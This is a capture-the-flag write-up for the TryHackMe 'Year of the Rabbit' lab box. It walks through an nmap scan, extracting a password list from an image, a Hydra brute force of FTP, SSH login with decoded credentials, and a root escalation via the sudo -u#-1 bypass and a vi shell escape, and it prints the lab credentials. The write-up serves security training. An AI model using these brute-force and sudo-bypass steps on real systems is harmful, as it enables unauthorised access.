mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-22 20:13:02 +00:00
247 lines
5.9 KiB
Markdown
247 lines
5.9 KiB
Markdown
|
# TryHackMe-YearOfRabbit
|
||
|
|
||
|
>Abdullah Rizwan | 09:12 PM , 18th October
|
||
|
|
||
|
## NMAP
|
||
|
|
||
|
```
|
||
|
Nmap scan report for 10.10.20.206
|
||
|
Host is up (0.17s latency).
|
||
|
Not shown: 997 closed ports
|
||
|
PORT STATE SERVICE VERSION
|
||
|
21/tcp open ftp vsftpd 3.0.2
|
||
|
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
|
||
|
| ssh-hostkey:
|
||
|
| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
|
||
|
| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
|
||
|
| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|
||
|
|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
|
||
|
80/tcp open http Apache httpd 2.4.10 ((Debian))
|
||
|
|_http-server-header: Apache/2.4.10 (Debian)
|
||
|
|_http-title: Apache2 Debian Default Page: It works
|
||
|
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
||
|
|
||
|
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||
|
Nmap done: 1 IP address (1 host up) scanned in 26.81 seconds
|
||
|
|
||
|
```
|
||
|
## PORT 80
|
||
|
|
||
|
Looking at the souce and visiting `css` file we will find a hidden page `/sup3r_s3cret_fl4g/` that will say to turn off javascript. We will be brought up to a Rick rolled video.
|
||
|
|
||
|
## Burpsuite
|
||
|
|
||
|
Intercept the request on `/sup3r_s3cret_fl4g/`
|
||
|
|
||
|
<img src="https://imgur.com/1Jzij6l"/>
|
||
|
|
||
|
<img src="https://imgur.com/hzYcZ0U"/>
|
||
|
|
||
|
Now visiting the page `/WExYY2Cv-qU`
|
||
|
|
||
|
We will find an image
|
||
|
|
||
|
running `strings` on image
|
||
|
|
||
|
```
|
||
|
Eh, you've earned this. Username for FTP is ftpuser
|
||
|
One of these is the password:
|
||
|
Mou+56n%QK8sr
|
||
|
1618B0AUshw1M
|
||
|
A56IpIl%1s02u
|
||
|
vTFbDzX9&Nmu?
|
||
|
FfF~sfu^UQZmT
|
||
|
8FF?iKO27b~V0
|
||
|
ua4W~2-@y7dE$
|
||
|
3j39aMQQ7xFXT
|
||
|
Wb4--CTc4ww*-
|
||
|
u6oY9?nHv84D&
|
||
|
0iBp4W69Gr_Yf
|
||
|
TS*%miyPsGV54
|
||
|
C77O3FIy0c0sd
|
||
|
O14xEhgg0Hxz1
|
||
|
5dpv#Pr$wqH7F
|
||
|
1G8Ucoce1+gS5
|
||
|
0plnI%f0~Jw71
|
||
|
0kLoLzfhqq8u&
|
||
|
kS9pn5yiFGj6d
|
||
|
zeff4#!b5Ib_n
|
||
|
rNT4E4SHDGBkl
|
||
|
KKH5zy23+S0@B
|
||
|
3r6PHtM4NzJjE
|
||
|
gm0!!EC1A0I2?
|
||
|
HPHr!j00RaDEi
|
||
|
7N+J9BYSp4uaY
|
||
|
PYKt-ebvtmWoC
|
||
|
3TN%cD_E6zm*s
|
||
|
eo?@c!ly3&=0Z
|
||
|
nR8&FXz$ZPelN
|
||
|
eE4Mu53UkKHx#
|
||
|
86?004F9!o49d
|
||
|
SNGY0JjA5@0EE
|
||
|
trm64++JZ7R6E
|
||
|
3zJuGL~8KmiK^
|
||
|
CR-ItthsH%9du
|
||
|
yP9kft386bB8G
|
||
|
A-*eE3L@!4W5o
|
||
|
GoM^$82l&GA5D
|
||
|
1t$4$g$I+V_BH
|
||
|
0XxpTd90Vt8OL
|
||
|
j0CN?Z#8Bp69_
|
||
|
G#h~9@5E5QA5l
|
||
|
DRWNM7auXF7@j
|
||
|
Fw!if_=kk7Oqz
|
||
|
92d5r$uyw!vaE
|
||
|
c-AA7a2u!W2*?
|
||
|
zy8z3kBi#2e36
|
||
|
J5%2Hn+7I6QLt
|
||
|
gL$2fmgnq8vI*
|
||
|
Etb?i?Kj4R=QM
|
||
|
7CabD7kwY7=ri
|
||
|
4uaIRX~-cY6K4
|
||
|
kY1oxscv4EB2d
|
||
|
k32?3^x1ex7#o
|
||
|
ep4IPQ_=ku@V8
|
||
|
tQxFJ909rd1y2
|
||
|
5L6kpPR5E2Msn
|
||
|
65NX66Wv~oFP2
|
||
|
LRAQ@zcBphn!1
|
||
|
V4bt3*58Z32Xe
|
||
|
ki^t!+uqB?DyI
|
||
|
5iez1wGXKfPKQ
|
||
|
nJ90XzX&AnF5v
|
||
|
7EiMd5!r%=18c
|
||
|
wYyx6Eq-T^9#@
|
||
|
yT2o$2exo~UdW
|
||
|
ZuI-8!JyI6iRS
|
||
|
PTKM6RsLWZ1&^
|
||
|
3O$oC~%XUlRO@
|
||
|
KW3fjzWpUGHSW
|
||
|
nTzl5f=9eS&*W
|
||
|
WS9x0ZF=x1%8z
|
||
|
Sr4*E4NT5fOhS
|
||
|
hLR3xQV*gHYuC
|
||
|
4P3QgF5kflszS
|
||
|
NIZ2D%d58*v@R
|
||
|
0rJ7p%6Axm05K
|
||
|
94rU30Zx45z5c
|
||
|
Vi^Qf+u%0*q_S
|
||
|
1Fvdp&bNl3#&l
|
||
|
zLH%Ot0Bw&c%9
|
||
|
```
|
||
|
|
||
|
## Hydra
|
||
|
```
|
||
|
hydra -l ftpuser -P passwords.txt ftp://10.10.20.206 -t 4
|
||
|
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
|
||
|
|
||
|
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-18 22:06:01
|
||
|
[DATA] max 4 tasks per 1 server, overall 4 tasks, 82 login tries (l:1/p:82), ~21 tries per task
|
||
|
[DATA] attacking ftp://10.10.20.206:21/
|
||
|
[21][ftp] host: 10.10.20.206 login: ftpuser password: 5iez1wGXKfPKQ
|
||
|
[STATUS] 82.00 tries/min, 82 tries in 00:01h, 1 to do in 00:01h, 3 active
|
||
|
1 of 1 target successfully completed, 1 valid password found
|
||
|
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-18 22:07:03
|
||
|
```
|
||
|
|
||
|
## FTP
|
||
|
|
||
|
```
|
||
|
root@kali:~/TryHackMe/Easy/YearOfTheRabbit# ftp 10.10.20.206
|
||
|
Connected to 10.10.20.206.
|
||
|
220 (vsFTPd 3.0.2)
|
||
|
Name (10.10.20.206:root): ftpuser
|
||
|
331 Please specify the password.
|
||
|
Password:
|
||
|
230 Login successful.
|
||
|
Remote system type is UNIX.
|
||
|
Using binary mode to transfer files.
|
||
|
ftp> ls -la
|
||
|
200 PORT command successful. Consider using PASV.
|
||
|
150 Here comes the directory listing.
|
||
|
drwxr-xr-x 2 0 0 4096 Jan 23 2020 .
|
||
|
drwxr-xr-x 2 0 0 4096 Jan 23 2020 ..
|
||
|
-rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt
|
||
|
226 Directory send OK.
|
||
|
ftp>
|
||
|
|
||
|
```
|
||
|
On getting `Eli's_Creds.txt` we will find brainfuck language
|
||
|
|
||
|
```
|
||
|
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
|
||
|
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
|
||
|
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
|
||
|
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
|
||
|
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
|
||
|
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
|
||
|
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
|
||
|
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
|
||
|
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
|
||
|
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
|
||
|
<]>+. <+++[ ->--- <]>-- ---.- ----. <
|
||
|
```
|
||
|
`https://www.dcode.fr/brainfuck-language`
|
||
|
|
||
|
on decoding it
|
||
|
|
||
|
```
|
||
|
User: eli
|
||
|
Password: DSpDiM1wAEwid
|
||
|
```
|
||
|
This may be the ssh password for `eli`
|
||
|
|
||
|
## SSH
|
||
|
|
||
|
```
|
||
|
root@kali:~/TryHackMe/Easy/YearOfTheRabbit# ssh eli@10.10.20.206
|
||
|
The authenticity of host '10.10.20.206 (10.10.20.206)' can't be established.
|
||
|
ECDSA key fingerprint is SHA256:ISBm3muLdVA/w4A1cm7QOQQOCSMRlPdDp/x8CNpbJc8.
|
||
|
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
|
||
|
Warning: Permanently added '10.10.20.206' (ECDSA) to the list of known hosts.
|
||
|
eli@10.10.20.206's password:
|
||
|
|
||
|
|
||
|
1 new message
|
||
|
Message from Root to Gwendoline:
|
||
|
|
||
|
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
|
||
|
|
||
|
END MESSAGE
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
eli@year-of-the-rabbit:~$
|
||
|
|
||
|
|
||
|
```
|
||
|
|
||
|
|
||
|
```
|
||
|
eli@year-of-the-rabbit:/home/gwendoline$ find / -type d -name "s3cr3t" 2>/dev/null
|
||
|
/usr/games/s3cr3t
|
||
|
```
|
||
|
|
||
|
```
|
||
|
cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\!
|
||
|
Your password is awful, Gwendoline.
|
||
|
It should be at least 60 characters long! Not just MniVCQVhQHUNI
|
||
|
Honestly!
|
||
|
|
||
|
Yours sincerely
|
||
|
-Root
|
||
|
|
||
|
```
|
||
|
## Previlege Escalation
|
||
|
|
||
|
```
|
||
|
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
|
||
|
```
|
||
|
on the vim editor
|
||
|
|
||
|
:!sh
|
||
|
|
||
|
```
|
||
|
# bash
|
||
|
```
|